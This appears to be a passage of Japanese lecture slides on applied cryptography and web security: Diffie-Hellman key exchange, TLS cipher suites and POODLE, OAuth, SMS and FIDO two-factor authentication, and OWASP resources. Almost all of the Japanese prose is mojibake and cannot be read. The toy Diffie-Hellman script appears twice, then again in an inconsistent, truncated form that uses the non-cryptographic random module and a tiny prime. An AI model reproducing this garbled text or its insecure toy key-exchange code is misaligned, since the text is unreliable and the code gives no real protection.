    ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β
    ڞ௨伴ΛऔΓग़ͯ͠
    શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ


  169. ཭ࢄର਺໰୊
    G = x^a mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a < p)
    ͜ͷΑ͏ͳࣜʹ͓͍ͯ
    xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕
    xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ
    ಛʹp͕ڊେͳૉ਺ͷ৔߹
    aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ


  170. Diffie-Hellman伴ڞ༗
    G = x^a mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a < p)
    ͜ͷΑ͏ͳࣜʹ͓͍ͯ
    xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕
    xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ
    ͜ͷඇରশੑΛ࢖ͬͯ௨৴ܦ࿏্ʹݟ͑Δ৘ใ͚ͩͰ͸
    ༰қʹ伴ΛٻΊΒΕͳ͍Α͏ʹ͢Δ
    ಛʹp͕ڊେͳૉ਺ͷ৔߹
    aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ


  171. Diffie-Hellman伴ڞ༗
    ͋Δཚ਺aΛ࡞Δ ͋Δཚ਺bΛ࡞Δ
    G_a = x^a mod p    G_b = x^b mod p
    n = G_b^a mod p    n = G_a^b mod p
    n͸ͲͪΒͷܭࢉํ๏Ͱ΋
    ಉ͡஋ʹͳΔ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ͜͜Ͱަ׵͞ΕΔG_a G_b
    ͔Β
    aͱbΛ஌Δࣄ͸Ͱ͖ͳ͍


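    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    # Toy Diffie-Hellman key agreement: Alice and Bob each pick a private
    # exponent, exchange x^secret mod p, and both arrive at the same value.
    import secrets
    # p and x are agreed with the peer beforehand = visible to an eavesdropper
    p=152219 # an arbitrary prime
    x=2 # any natural number in [2, p)
    # these values are never put on the wire = invisible to an eavesdropper
    # Drawn from the OS CSPRNG (secrets) rather than the `random` module:
    # a predictable exponent lets a passive observer reproduce the shared
    # value. randbelow(p-2)+2 yields 2 <= secret < p, matching the
    # 2 <= a < p condition on the slides (randint(2, p) could return p).
    secret1=secrets.randbelow(p-2)+2
    secret2=secrets.randbelow(p-2)+2
    print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 )
    print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 )
    # these values are sent to the peer = visible to an eavesdropper
    public1=pow( x, secret1, p )
    public2=pow( x, secret2, p )
    print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 )
    print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 )
    # these two values agree: (x^b)^a = (x^a)^b mod p
    key1=pow( public2, secret1, p )
    key2=pow( public1, secret2, p )
    print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 )
    print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 )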
    Diffie-Hellman伴ڞ༗
    $ ./dh.py
    Alice͕࡞ͬͨൿີͷ஋: 118909
    Bob͕࡞ͬͨൿີͷ஋: 89005
    Alice͔ΒBobʹૹΔ஋: 26981
    Bob͔ΒAliceʹૹΔ஋: 123319
    Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243
    Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243


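    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    # Toy Diffie-Hellman key agreement: Alice and Bob each pick a private
    # exponent, exchange x^secret mod p, and both arrive at the same value.
    import secrets
    # p and x are agreed with the peer beforehand = visible to an eavesdropper
    p=152219 # an arbitrary prime
    x=2 # any natural number in [2, p)
    # these values are never put on the wire = invisible to an eavesdropper
    # Drawn from the OS CSPRNG (secrets) rather than the `random` module:
    # a predictable exponent lets a passive observer reproduce the shared
    # value. randbelow(p-2)+2 yields 2 <= secret < p, matching the
    # 2 <= a < p condition on the slides (randint(2, p) could return p).
    secret1=secrets.randbelow(p-2)+2
    secret2=secrets.randbelow(p-2)+2
    print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 )
    print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 )
    # these values are sent to the peer = visible to an eavesdropper
    public1=pow( x, secret1, p )
    public2=pow( x, secret2, p )
    print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 )
    print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 )
    # these two values agree: (x^b)^a = (x^a)^b mod p
    key1=pow( public2, secret1, p )
    key2=pow( public1, secret2, p )
    print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 )
    print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 )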
    Diffie-Hellman伴ڞ༗
    $ ./dh.py
    Alice͕࡞ͬͨൿີͷ஋: 118909
    Bob͕࡞ͬͨൿີͷ஋: 89005
    Alice͔ΒBobʹૹΔ஋: 26981
    Bob͔ΒAliceʹૹΔ஋: 123319
    Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243
    Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243
    7243ͱ͍͏஋Λڞ༗Ͱ͖ͨ
    ͜ͷ஋Λ΋ͱʹͯ͠ڞ௨伴҉߸ͷ伴Λ࡞Δ͜ͱ͕Ͱ͖Δ


  174. Diffie-Hellman Ephemeral
    Ұ࣌త
    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    import random
    random.seed()
    # pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ
    p=152219 # ೚ҙͷૉ਺
    x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺
    # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
    secret1=random.randint(2,p)
    secret2=random.randint(2,p)
    print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 )
    print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 )
    # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ
    public1=pow( x, secret1, p )
    public2=pow( x, secret2, p )
    print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 )
    print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 )
    # ͜ͷ஋͕Ұக͢Δ
    key1=pow( public2, secret1, p )
    ͜ͷ஋Λ伴ڞ༗Λߦ͏౓ʹ
    มߋ͢Δ
    ͜ͷ஋͕ແ͍ͱ伴Λ
    ಛఆͰ͖ͳ͍͕
    ͜ͷ஋ࣗମ͸౪ௌͰ͖ͳ͍ͨΊ
    ϑΥϫʔυηΩϡϦςΟ͕ಘΒΕΔ
    ൿີͷ஋͕ຖճมΘΔͷͰ૬ख͕ຊ෺͔Ͳ͏͔ͷ֬ೝ͕Ͱ͖ͳ͘ͳΔ
    ૬ख͕ຊ෺Ͱ͋Δ͜ͱͷ֬ೝ͸RSAΛ࢖ͬͯߦ͏


  175. DHE-RSA-AES256-SHA256
    TLS͕Diffie-Hellman伴ڞ༗Λ࢖͍ͬͯΔ͔Ͳ͏͔
    TLSͷ҉߸εΠʔτ໊ΛݟΕ͹Θ͔Δ
    ڞ௨伴ͷڞ༗ʹ
    Diffie-Hellman Ephemeral
    Λ࢖͏
    ௨৴૬ख͕ຊ෺Ͱ͋ΔࣄΛ
    RSAͰ͔֬ΊΔ
    256bitͷAESΛ࢖ͬͯσʔλΛ҉߸Խ͢Δ
    σʔλͷվ͟ΜΛݕग़͢ΔͨΊʹڞ௨伴ͱσʔλͷ
    SHA-256ϋογϡΛ࢖͏


  176. ପԁ཭ࢄର਺໰୊
    ཭ࢄର਺໰୊͸
    ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δͷʹ
    ࢦ਺࣌ؒΛཁ͢Δ໰୊Ͱ͋Δ
    ٯࢉͰ͖ͳ͍Θ͚Ͱ͸ͳ͍ͷͰ
    े෼େ͖ͳ஋Λ࢖ͬͯٯࢉʹ͕͔͔࣌ؒΔΑ͏ʹ͢Δඞཁ͕͋Δ
    ପԁ཭ࢄର਺໰୊͸
    ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δํ๏͕஌ΒΕ͍ͯͳ͍
    ٯࢉ͢Δํ๏͕ൃݟ͞Εͳ͍ݶΓ͸
    ૯౰ͨΓ߈ܸʹ଱͑ΒΕΔఔ౓ͷେ͖͞ͷ஋Ͱྑ͍


  177. ପԁۂઢDiffie-Hellman伴ڞ༗
    ཭ࢄର਺໰୊ͷ୅ΘΓʹପԁ཭ࢄର਺໰୊Λ࢖͏
    Diffie-Hellman伴ڞ༗
    TLSʹ͓͍ͯ͸
    Elliptic Curve Diffie-Hellman Ephemeral
    ུͯ͠ECDHEͱදه͞ΕΔ
    ݱ࣌఺Ͱ౪ௌऀʹݱ࣮తͳ࣌ؒͰ伴Λ஌ΒΕͳ͍ͨΊʹ
    RFC7525Ͱਪ঑͞Ε͍ͯΔ஋ͷେ͖͞
    Diffie-Hellman伴ڞ༗ ପԁۂઢDiffie-Hellman伴ڞ༗
    CJU CJU
    https://tools.ietf.org/html/rfc7525


  178. ͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋
    ͓͍֮͑ͯͯཉ͍͠ࣄ
    ౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠
    ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏


  179. TLS͸ྺ࢙͋ΔϓϩτίϧͳͷͰ
    ࠓ೔Ͱ͸҆શͱݴ͑ͳ͍҉߸ٕज़ʹ΋ରԠ͍ͯ͠Δ
    TLS͸઀ଓ࣌ʹαʔόͱΫϥΠΞϯτ͕࢖͑Δ҉߸ٕज़Λௐ΂ͯ
    ྆ऀ͕ରԠ͍ͯ͠Δ҉߸ٕज़Ͱ௨৴ΛࢼΈΔ
    ྫ͑͹ࠓ೔Ͱ͸ݱ࣮తͳ࣌ؒͰղಡͰ͖Δ512bitͷRSA΍RC4ʹ΋ରԠ͍ͯ͠Δ
    SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
    coming soon
    1994೥ 1996೥ 1999೥ 2006೥ 2008೥


  180. ಡΊΔ
    SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
    coming soon
    1994೥ 1996೥ 1999೥ 2006೥ 2008೥
    2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ
    ݹ͍҉߸ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ
    ΠϚυΩͷ҉߸OK ΠϚυΩͷ҉߸ແཧ
    ΠϚυΩͷ҉߸OK
    ΠϚυΩͷ҉߸ແཧ
    ऑ͍҉߸ ऑ͍҉߸
    Alice Bob
    ౪ௌऀ


  181. POODLE(CVE-2014-3566)
    https://nvd.nist.gov/vuln/detail/CVE-2014-3566
    2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ
    SSL 3.0ͷن্֨ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ
    ͜͜ʹ
    NISTʹΑΔPOODLEͷղઆΛషΔ


  182. SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
    coming soon
    1994೥ 1996೥ 1999೥ 2006೥ 2008೥
    TLS 1.3Ͱ͸ࠓͰ͸҆શͰͳ͍҉߸ٕज़͕࠷ॳ͔Β࢖༻ෆೳʹͳΔ
    TLS1.3͕ҰൠతʹͳΔ·Ͱ͸
    TLS 1.2͕࣋ͭػೳͷ͏ͪ
    ةݥͱ͞Ε͍ͯΔػೳΛ੾ͬͨঢ়ଶͰӡ༻
    SSL 3.0ͷΑ͏ͳຊ౰ʹݹ͍҉߸͔͠ରԠ͍ͯ͠ͳ͍௨৴૬ख͸
    ௨৴ΛఘΊͯ΋Β͏͔͠ͳ͍


  183. RFC7525
    Recommendations for Secure Use of Transport Layer Security (TLS)
    and Datagram Transport Layer Security (DTLS)
    TLS 1.2ͷػೳͷ͏ͪ
    ԿΛ੾͓ͬͯ͘΂͖͔͕
    ·ͱΊΒΕ͍ͯΔ
    https://tools.ietf.org/html/rfc7525
    ඇެࣜͳ೔ຊޠ༁ https://summerwind.jp/docs/rfc7525
    ͜͜ʹ
    RFC7525ͷAbstractΛషΔ


  184. ͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋
    ͓͍֮͑ͯͯཉ͍͠ࣄ
    ౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠
    ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏
    TLSΛ࢖͏࣌͸
    ࠓͰ͸҆શͰ͸ͳ͍ݹ͍ػೳΛ੾Ζ͏
    NEW!


  185. ຊ෺ͷϢʔβͱ
    ِ෺ͷϢʔβΛݟ෼͚Δ


  186. ೝূ
    Alice
    Aliceͷ;ΓΛ͢Δ
    ѱҙ͋Δୈࡾऀ
    AliceͰ͢
    AliceͰ͢
    αʔό͕ຊ෺͔Ͳ͏͔Λ͔֬ΊΔ࣌ͱҧ͍
    Ϣʔβ͸ূ໌ॻΛ͍࣋ͬͯͳ͍


  187. ύεϫʔυೝূ
    ύεϫʔυ͸
    Ͱ͢
    ݹ͔͘Βར༻͞Ε͍ͯΔϢʔβͷೝূํ๏
    ຊ෺ͷAliceͳΒ
    ύεϫʔυΛ஌͍ͬͯΔഺ
    ʜ
    Alice
    Aliceͷ;ΓΛ͢Δ
    ѱҙ͋Δୈࡾऀ


  188. ύεϫʔυೝূͷ໰୊఺
    ʜ๨Ε·ͨ͠
    ͍ΖΜͳαʔϏεʹ͍ΖΜͳύεϫʔυΛઃఆ͍ͯͨ͠Β
    Ϣʔβ͸ύεϫʔυΛ๨ΕΔ
    ຊ෺ͷAliceͳΒ
    ύεϫʔυΛ஌͍ͬͯΔഺ
    ʜ
    Alice
    Aliceͷ;ΓΛ͢Δ
    ѱҙ͋Δୈࡾऀ


  189. ൿີͷ࣭໰
    ͜ΕͰ͸ύεϫʔυΛΑΓ؆୯ʹ͍ͯ͠ΔΑ͏ͳ΋ͷͰ͋Δ
    ޷͖ͳ৯΂෺͸
    ͳΜͰ͔͢
    Alice
    Aliceͷ;ΓΛ͢Δ
    ѱҙ͋Δୈࡾऀ
    ਖ਼ղ
    ύεϫʔυΛઃఆ͠௚͍ͯͩ͘͠͞


  190. OAuthೝূ
    ଟ͘ͷϢʔβ͸
    Googleɺfacebook౳ͷ
    ΞΧ΢ϯτΛ͍࣋ͬͯΔ
    αʔϏε͸
    ࣗ෼͕ͲΜͳ৘ใΛ
    ඞཁͱ͍ͯ͠Δ͔Λొ࿥͢Δ
    Ϣʔβ͸ͨ͘͞ΜͷαʔϏεΛར༻͍ͯ͠Δ
    ͦΕΒʹݸผʹύεϫʔυΛઃఆ͍ͯͨ͠Β
    ύεϫʔυΛ๨Εͯ͠·͏ͷ͸౰વͰ͋Δ


  191. OAuthೝূ
    ͋ͷαʔϏε
    ͋ͷαʔϏεʹ
    ϩάΠϯ͍ͨ͠
    ͋ͷαʔϏεʹ
    ͜Ε͚ͩͷ৘ใΛ౉͚͢ͲOK?
    OK
    ͋ͷαʔϏεʹ
    ϦΫΤεττʔΫϯ***Λ
    ౉͍ͯͩ͘͠͞


  192. OAuthೝূ
    ͋ͷαʔϏε
    ϦΫΤεττʔΫϯ***
    Ͱ͢
    ϦΫΤεττʔΫϯ***
    ͱ͔͍͏ͷ͕དྷͨΜ͚ͩͲ
    ͦͷਓ͸͏ͪͷAlice͞ΜͳͷͰ
    ௨͍ͯ͋͛ͯͩ͘͠͞
    Alice͞ΜͷৄࡉΛ஌Γ͍ͨ৔߹͸
    ΞΫηετʔΫϯ???Λ࢖͍ͬͯͩ͘͞


  193. ͜͜ʹ
    χίχίಈըͷ
    ϩάΠϯը໘ΛషΔ
    Ϣʔβ͸ීஈ࢖͍ͬͯΔSNS౳ʹ
    ϩάΠϯ͢Ε͹αʔϏεΛར༻Ͱ͖Δ
    αʔϏεຖʹ
    ύεϫʔυΛ֮͑Δඞཁ΋
    αʔϏεຖʹύεϫʔυΛೖྗ͢Δඞཁ΋ͳ͍
    αʔϏεఏڙऀ͸
    ۩ମతͳϢʔβೝূΛ
    ΑͦͷαʔϏεʹؙ౤͛Ͱ͖Δ
    ͜͏͍͏ͷ
    OAuthೝূ
    OAuthೝূΛ׆༻͍ͯ͠ΔαʔϏεͷྫ χίχίಈը
    https://account.nicovideo.jp/login


  194. 2ཁૉೝূ
    Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ
    1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔
    ύεϫʔυೝূ౳
    2.Ϣʔβ͸ԿͰ͋Δ͔
    ࢦ໲ೝূ౳
    3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔
    ਎෼ূͷఏࣔ౳
    1Ҏ֎͸ಛผͳ૷ஔΛཁ͢Δҝ
    ैདྷଟ͘ͷΠϯλʔωοτ্ͷαʔϏε͸1͚ͩΛ࢖͖ͬͯͨ


  195. ϑΟογϯά
    ຊ෺ͷαʔϏε
    ِ෺ͷαʔϏε
    ύεϫʔυ͸
    Ͱ͢
    ύεϫʔυ͸
    Ͱ͢
    ύεϫʔυ͸
    Ͱ͢
    Ϣʔβ͕ԿΛ஌͍ͬͯΔ͔͸
    ϑΟογϯάʹର͢Δ଱ੑ͕ͳ͍


  196. 2ཁૉೝূ
    Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ
    1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔
    ύεϫʔυೝূ౳
    2.Ϣʔβ͸ԿͰ͋Δ͔
    ࢦ໲ೝূ౳
    3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔
    ਎෼ূͷఏࣔ౳
    2ͱ3ͷ͍ͣΕ͔Λซ༻ͯ͠ͳΓ͢·͠Λ๷͙ඞཁ͕͋Δ


  197. SMSΛར༻ͨ͠2ཁૉೝূ
    3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔
    Ϣʔβ͸ొ࿥͞Ε͍ͯΔܞଳి࿩Λ͍࣋ͬͯΔ͔
    ύεϫʔυ͸
    Ͱ͢
    SMSʹૹͬͨ൪߸Λ
    ೖྗ͍ͯͩ͘͠͞


    ϩάΠϯ੒ޭ


  198. SMSΛར༻ͨ͠2ཁૉೝূͷ໰୊఺
    ύεϫʔυ͸
    Ͱ͢

    ѱҙ͋Δୈࡾऀ͕SMSΛ೷͖ݟͰ͖ͨΒ
    ೝূΛಥഁ͞ΕΔ
    ͦ΋ͦ΋൪߸ೖྗ͢Δͷ
    ΊΜͲ͍͘͞
    ΋ͬͱ҆શ͔ͭखܰʹ
    2ཁૉೝূ͢ΔͨΊͷಓ۩͸
    ࡞Εͳ͍ͩΖ͏͔


  199. FIDO U2F
    https://www.yubico.com/products/yubikey-hardware/
    Ϣʔβ͕͔֬ʹ͜ͷUSBσόΠεΛ͍࣋ͬͯΔࣄΛ
    ެ։伴҉߸Λ࢖ͬͯূ໌͢Δ૷ஔ
    ͜͜ʹ
    ࣮ࡍʹചΒΕ͍ͯΔFIDO U2FͷσόΠεͷը૾ΛషΔ


  200. FIDO U2FͰϢʔβొ࿥
    Ϣʔβొ࿥
    AppIDΛఴ͑ͯ伴ੜ੒Λཁٻ
    AppIDʹରԠ͢Δ
    ൿີ伴ͱެ։伴Λ࡞Δ
    ެ։伴ͱೝূثূ໌ॻͱ
    ೝূثূ໌ॻͰ࡞ͬͨॺ໊Λฦ͢
    ॺ໊Λ࢖ͬͯ
    ৴པͰ͖ΔೝূثͰ͋ΔࣄΛ֬ೝ
    ެ։伴Λอଘ
    ొ࿥׬ྃ


  201. FIDO U2FͰϩάΠϯ
    ύεϫʔυೝূ
    AppIDʹରԠ͢Δ
    ൿີ伴ͰchallengeΛ҉߸Խ
    ҉߸Խͨ͠challengeΛฦ͢
    อଘͯ͋͠Δެ։伴Ͱ
    challengeΛ෮߸Ͱ͖ΔࣄΛ֬ೝ
    ೝূ׬ྃ
    ύεϫʔυΛ֬ೝ
    AppIDͱchallengeΛૹ৴


  202. FIDO UAF
    ͦ΋ͦ΋ύεϫʔυΛೖྗ͢Δͷ͕ΊΜͲ͍͘͞
    1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔
    ύεϫʔυೝূ౳
    2.Ϣʔβ͸ԿͰ͋Δ͔
    ࢦ໲ೝূ౳
    3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔
    ਎෼ূͷఏࣔ౳
    1Λ࢖Θͣʹ2ͱ3Ͱ2ཁૉೝূ͠Α͏


  203. FIDO UAF
    ੜମೝূ͕ඞཁʹͳΔͨΊෳࡶͳϋʔυ΢ΣΞ͕ඞཁʹͳΔ͕
    Xperia XZ1͕FIDO UAF 1.1ʹ४ڌͨ͠ॳͷσόΠεʹͳͬͨࣄΛใ͡Δهࣄ
    https://fidoalliance.org/first-fido-uaf-1-1-implementations-ease-deployment-advanced-biometric-authentication-android-devices/
    αʔϏε͕FIDO UAFʹରԠ͢Δ͜ͱͰ
    ͜͏ͨ͠σόΠεͷϢʔβʹύεϫʔυෆཁͷೝূΛఏڙͰ͖Δ
    ͜͜ʹ
    Xperia XZ1͕FIDO UAF 1.1ʹ४ڌͨ͜͠ͱΛใ͡ΔهࣄΛషΔ


  204. Webϖʔδʹର͢Δ
    ߈ܸʹඋ͑Δ


  205. OWASP
    https://www.owasp.org/
    ҆શͳWebΞϓϦέʔγϣϯͷҝͷ৘ใͷڞ༗΍ܒൃΛߦ͏
    ΦʔϓϯίϛϡχςΟ
    ͜͜ʹ
    OWASPͷτοϓϖʔδΛషΔ


  206. OWASP Top 10
    WebΞϓϦέʔγϣϯ։ൃऀ΁ͷ஫ҙשىΛ໨తͱͯ͠
    WebΞϓϦέʔγϣϯͷ୅දతͳ੬ऑੑΛ10छྨબΜͩ΋ͷ
    https://www.owasp.org/images/2/23/OWASP_Top_10-2017%28ja%29.pdf
    ࠷৽൛͸OWASP Top 10 2017Ͱ೔ຊޠ༁΋ଘࡏ͢Δ
    ͜͜ʹ
    OWASP Top 10ͷදࢴΛషΔ


  207. OWASP Top 10
    ΠϯδΣΫγϣϯ
    ೝূͷෆඋ
    ػඍͳ৘ใͷ࿐ग़
    9.-֎෦ΤϯςΟςΟࢀর
    ΞΫηε੍ޚͷෆඋ
    ෆద੾ͳηΩϡϦςΟઃఆ
    ΫϩεαΠτεΫϦϓςΟϯά
    ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ
    ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτͷ࢖༻
    ෆे෼ͳϩΪϯάͱϞχλϦϯά


  208. ͜͜ʹ
    OWASP Top 10ͷΠϯδΣΫγϣϯͷղઆΛషΔ
    OWASP Top 10
    https://www.owasp.org/images/2/23/OWASP_Top_10-2017%28ja%29.pdf
    ੬ऑੑͷछྨຖʹ
    ͲͷΑ͏ʹൃݟ͢Ε͹ྑ͍͔
    ͲͷΑ͏ʹ๷ࢭ͢Ε͹ྑ͍͔
    ͕వΊΒΕ͍ͯΔ
    ΠϯδΣΫγϣϯʹର͢Δ๷ࢭํ๏
    ΠϯλϓϦλ͔ΒΫΤϦΛ౤͛ͳ͍
    ύϥϝʔλԽ͞ΕͨΠϯλʔϑΣʔε
    ·ͨ͸ORMΛ࢖͏
    ಡ΋͏


  209. ͜͜ʹ
    OWASP ASVSͷදࢴΛషΔ
    OWASP Application Security Verification Standard
    WebΞϓϦέʔγϣϯͷ҆શੑΛݕূ͢ΔͨΊʹ
    νΣοΫ͢΂͖߲໨Λ·ͱΊͨ΋ͷ
    ࠷৽൛͸OWASP ASVS 3.0.1Ͱ೔ຊޠ༁΋ଘࡏ͢Δ
    https://www.jpcert.or.jp/securecoding/materials/owaspasvs.html


  210. ͜͜ʹ
    OWASP ASVSͷνΣοΫ߲໨ͷҰ෦ΛషΔ
    OWASP Application Security Verification Standard
    https://www.jpcert.or.jp/securecoding/materials/owaspasvs.html
    ͋ΒΏΔΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ1
    ݸਓ৘ใ΍վ͟Μ͞ΕΔͱࠔΔ৘ใΛѻ͏
    ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ2
    ো֐ͷൃੜ͕૊৫ͷଘଓ΍ਓ໋ʹؔΘΔ
    ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ3
    Ϩϕϧ্͕͕Δ΄ͲνΣοΫ߲໨͕૿͑Δ
    ύεϫʔυมߋػೳʹ
    ݹ͍ύεϫʔυͷೖྗ
    ৽͍͠ύεϫʔυͷೖྗ
    ৽͍͠ύεϫʔυͷ֬ೝ
    ͷ3ͭΛཁٻ͍ͯ͠Δ͔Ͳ͏͔ΛνΣοΫ
    WebΞϓϦέʔγϣϯΛ࡞ͬͨΒ
    νΣοΫ͠Α͏


  211. ͜͜ʹ
    OWASP WebGoatͷը૾ΛషΔ
    OWASP WebGoat
    https://github.com/WebGoat/WebGoat
    JavaͰॻ͔ΕͨWebΞϓϦέʔγϣϯ
    ҙਤతʹ༷ʑͳ੬ऑੑ͕࢓ࠐ·Ε͍ͯΔ
    ੬ऑੑΛ࣮ફతʹֶͼ͍ͨ
    ࣗ෼ͷߦͳ͍ͬͯΔ੬ऑੑͷνΣοΫ͕
    ਖ਼͍͔͔֬͠Ί͍ͨ
    ͦ͏͍͏࣌ʹ࢖͑Δ


  212. ࠷ޙʹ


  213. ͋ΒΏΔιϑτ΢ΣΞηΩϡϦςΟ͸
    ෺ཧతͳηΩϡϦςΟΛલఏͱ͍ͯ͠Δ
    ѱҙ͋Δୈࡾऀ͕αʔόϧʔϜʹ৵ೖͯ͠ిݯέʔϒϧΛൈ͘͜ͱͰ
    αʔϏεΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ੬ऑੑ
    ·ͣށకΓ
    ιϑτ΢ΣΞηΩϡϦςΟ͸ͦΕ͔Βͩ
    ͜ͷΑ͏ͳ߈ܸʹରͯ͠ιϑτ΢ΣΞ͸جຊతʹଧͭख͕ͳ͍


  214. ՝୊
    CVE-2014-0160
    ͜ͷ੬ऑੑ͕Ͳ͏͍͏࣌ʹԿ͕ى͜Δ΋ͷͰ
    ͦͷ݁ՌͲͷΑ͏ͳѱӨڹ͕༧૝͞ΕΔ͔Λઆ໌͍ͯͩ͘͠͞
    ͜ͷ੬ऑੑΛճආ͢ΔͨΊʹͱΓ͏ΔରԠΛ1ͭҎ্ड़΂͍ͯͩ͘͞
